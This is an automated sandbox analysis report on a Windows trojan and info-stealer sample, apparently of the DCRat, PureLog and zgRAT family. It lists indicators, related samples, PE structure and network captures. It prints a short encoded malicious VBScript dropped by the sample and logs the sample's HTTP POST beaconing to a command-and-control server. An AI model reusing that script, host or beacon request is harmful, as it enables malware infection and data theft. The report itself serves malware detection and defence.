https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.106.93.197	svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006FCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.000000000707F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.106H	svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.106.93.197	unknown	Russian Federation		50113	SUPERSERVERSDATACENTERRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1500382
Start date and time:	2024-08-28 11:16:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ugRGgCJhQl.exe renamed because original name is a hash value
Original Sample Name:	92949DD923E8E88C697092B5311C7D95.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/466@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:17:16	API Interceptor	12328587x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.106.93.197	eCGKhYZtgx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SUPERSERVERSDATACENTERRU	eCGKhYZtgx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.106.93.197
	.........exe	Get hash	malicious	Unknown	Browse	185.217.199.97
	cG56dFZSnL.exe	Get hash	malicious	Stealc, Vidar	Browse	185.217.197.202
	WebDriverDll.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.188.183.218
	fkABXcncEA.exe	Get hash	malicious	RedLine, Xmrig	Browse	185.17.0.139
	Lisect_AVT_24003_G1B_122.exe	Get hash	malicious	Unknown	Browse	185.232.169.108
	8E16230A9D5336FB1D6C6278B45E3B653AA2F6CD060742F28CD68D6A5117A396.exe	Get hash	malicious	Bdaejec, DCRat, RedLine	Browse	185.189.14.66
	https://tg-pixel.gitbook.io/2	Get hash	malicious	Unknown	Browse	84.252.73.22
	SZwdzMMRBU.elf	Get hash	malicious	Unknown	Browse	194.39.64.3
	Df5pMQckwD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.180.231.214

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\LMrHnriI.log	eCGKhYZtgx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	czcgyt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	trkfmve.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	iolZQ9869U.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	jZrY9owO7A.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Componentsession.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	-#U00bc).exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Loader.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	fluent.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
C:\Users\user\Desktop\ApTjSBhc.log	eCGKhYZtgx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	WebDriverDll.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Loader.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	K61NUunFJv.exe	Get hash	malicious	DCRat	Browse
	TYg9Jx5SUa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	jNdchqKV8i.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SjA6nVF1ey.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	vD4M7DL9MY.exe	Get hash	malicious	DCRat	Browse
	OIqT7902yf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	h6t9F6kG2d.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Process:	C:\comref\svchost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\ugRGgCJhQl.exe
File Type:	data
Category:	dropped
Size (bytes):	199
Entropy (8bit):	5.754681013833954
Encrypted:	false
SSDEEP:	6:GhwqK+NkLzWbH9WF08nZNDd3RL1wQJRrUceLVRZs:G0MCzWL74d3XBJyvjG
MD5:	551C8B5ECBF34768AE70749B3C650F32
SHA1:	9BF4528CA17FFCA526876B679480E6A4090DAEC6
SHA-256:	C11F12CF1717FAA96FA52BDB3160477D226C0FCC96389EDFFCF62DD6F15F7D1E
SHA-512:	AF7CAD203C71C4E511AED129E0361C9BA4DA147033844380BB5C99ABCE49585FA75F5E684F15869CE985DBBE5F5314BF10BBCCA03207B28A329ACE4139EC6FFC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^rgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJmGsD.0zJN(/MySuj;.qVz99c8lDJ~,TSP6l^/nvDUAAA==^#~@.

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.491839047276129
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ugRGgCJhQl.exe
File size:	2'295'916 bytes
MD5:	92949dd923e8e88c697092b5311c7d95
SHA1:	cb61d5772f5e07467734af1c151e831ff225ea17
SHA256:	b7d005d2dee9456e5fbdb5f7d46a7275a9c7000ec6cbf982eee58897f88fa4c8
SHA512:	a29b71a960529cbbbecd8050dfe1264e6cfccafbbe08fe575740eb50a1eb37c2c840db2a4fe1cc66b3a2fd2a5cfb5388d3adae2b6cb2add29c15f3ac87f0ed25
SSDEEP:	49152:IBJGcql3qzKdi2mcnaKgkxueaRFuNZWYUshMtQd0:yIcqlO2mRKg+mwhhSN
TLSH:	60B5CF06EDA28E32C1A13F3684DB142E52F1DB21BA12EF0B762F10D5AC15175EE572F6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 11:17:39.091234922 CEST	53	51262	1.1.1.1	192.168.2.7
Aug 28, 2024 11:17:52.635234118 CEST	53	49465	1.1.1.1	192.168.2.7

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:16.385152102 CEST	414	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
